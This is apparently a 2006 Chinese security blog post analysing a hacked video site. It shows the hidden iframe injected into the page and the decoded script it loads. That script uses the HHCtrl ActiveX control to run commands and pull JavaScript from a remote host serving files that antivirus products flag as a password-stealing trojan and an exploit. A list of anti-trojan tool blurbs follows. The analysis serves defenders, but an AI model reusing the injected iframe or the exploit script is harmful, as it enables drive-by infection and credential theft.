endurer 原创
2006-04-12 第2版 补充:kaspersky的回复
2006-04-11 第1版
网页:
hxxp://www.****44mtv.com/vod/index1.htm
中被加入
<iframe src="hxxp://www.****26cd.com/test/index.htm" height="0" width="0" MARGINWIDTH="0" MARGINHEIGHT="0" HSPACE="0" VSPACE="0" FRAMEBORDER="0" SCROLLING="no"></iframe>
hxxp://www.****26cd.com/test/index.htm部分代码使用了escape()编码,unescape()后的内容为:
<SCRIPT>var Words="<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT><SCRIPT language=VScript src="bbs003302.css"></SCRIPT><HTML><BODY><div style="display:none"><OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'></OBJECT><OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language=JScript src=///"hxxp://www.****26cd.com/test/bbs003302.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT></BODY></HTML>
";document.write(unescape(Words))</SCRIPT>
下载2个文件:
1、bbs003302.css
Kaspersky报为Trojan-PSW.Win32.Lmir.atj
2、bbs003302.gif
瑞星报为Exploit.HHCtrl.Jiaozhu
Kaspersky报为exploit.VBS.Phel.m
分享到:
相关推荐
Gdwli32盗号木马专杀工具
可牛盗号木马专杀工具.exe
处理了一下第一版大家的要求,修复了一些小的bug,加入了自动更新程序,在windows2003、windows xp、windows 2000 server 无.net环境下测试通过,简单的更新说明如下: 1.添加自动升级模块,.net环境下可完成在线...
对于QQ盗号木马而言,通常会出现两种情况:弹出酷似QQ登录的伪界面,用户将QQ账号和密码输入伪登录界面后,立即会弹出各种奇怪的QQ软件出错提示,随后自动关闭此界
CIW-04(木马的原理、病毒的危害),描述具体攻击
木马专家2006是一款防杀木马软件,软件除了采用传统病毒库查杀木马以外,还能查杀未知木马,自动监控内存非法程序,实时查杀内存和硬盘木马。第二代查杀内核,查杀木马更快速,软件本身还集成了IE修复,恶意网站拦截...
网站木马清专家是一款针对网页木马及网站挂马进行查杀与防御的服务器应用软件。软件通过两个步骤可有较提高网站的安全性和稳定性。 首先是查杀木马部份,这一部份可以对服务器上已有的网页木马和被挂马的网站进行...
巨盾是一款优秀的网游防盗号安全保护软件,与其他杀软和防火墙可以很好地共用。巨盾强悍的木马查杀功能和网游保险箱功能可以更好地保护您的网游帐户安全! 1.[扫描木马功能]通过特征脚本扫描系统中的木马,采用...
近期有些万像破解版本后门下载木马。引起网吧大面积盗号。 特别制作此补丁 下载后在万象服务器使用一次即可。
清楚网页木马---网页木马相关技术总结 清楚网页木马---网页木马相关技术总结
有效查杀各种流行 QQ盗号木马,网游盗号木马,冲击波,灰鸽子,黑客后门等十多万种木马间谍程序。 木马专家2016全新改进 1.优化大部分内核代码提高执行效率 2.更低的CPU和内存占用率 3.更高效主动木马查杀和可疑...
第一章 木马概述 - 4 - 1.1“木马”名称的由来 - 4 - 1.2木马病毒发展史 - 4 - 1.2.1第一代木马 :伪装型病毒 - 4 - 1.2.2第二代木马 :AIDS型木马 - 4 - 1.2.3第三代木马:网络传播性木马 - 5 - 1.3研究木马...
系统提供了全站扫描、按文件夹和指定文件扫描三种扫描方式,如果网站文件比较少的话,推荐使用"全站扫描",如果文件比较多,推荐 使用按文件夹扫描。扫描过程,系统会记录被扫描过的文件列表,同时对怀疑是木马程序...
第一章 木马概述 - 4 - 1.1“木马”名称的由来 - 4 - 1.2木马病毒发展史 - 4 - 1.2.1第一代木马 :伪装型病毒 - 4 - 1.2.2第二代木马 :AIDS型木马 - 4 - 1.2.3第三代木马:网络传播性木马 - 5 - 1.3研究木马原理的...
新增网页防火墙功能,可阻止挂马网站攻击 新增时事修复漏洞功能,高危漏洞抢先修复 新增设置中心功能,系统保护策略随心定制 支持补丁管理功能,漏洞补丁不需重新下载 支持代理服务器和漏洞修复完成关机设置 扫描...
网站木马清理专家 V1.2 全功能免费版 该版本拥有 网站木马清理专家 全部功能;现在免费开放使用! 说明:部份用户下载后提示有病毒,请大家放心使用该软件,没有设置任何后门;在杀毒软件上设置为例外即可!另外...
react-screen:一个与众不同的React旋转木马组件
防盗号杀木马用巨盾!巨盾首创网游密保卡保护功能,巨盾64位的保险箱是首款支持64位系统的保险箱。 巨盾主要是针对网游安全设计的,具有强悍的活体木马查杀功能和网游保险箱功能,尤其是巨盾最近针对魔兽、QQ、...
木马克星黑客杀木马工具,可以查杀8122种国际木马,1053种密码偷窃木马,保证查杀传奇密码偷窃木马,oicq类寄生木马,冰河类文件关联木马,密码解霸,奇迹射手等...都需要Iparmor 确认,不仅可以查杀木马,更可以反查黑客密码.
是现代木马的姥姥的故事~~值得一看,很详细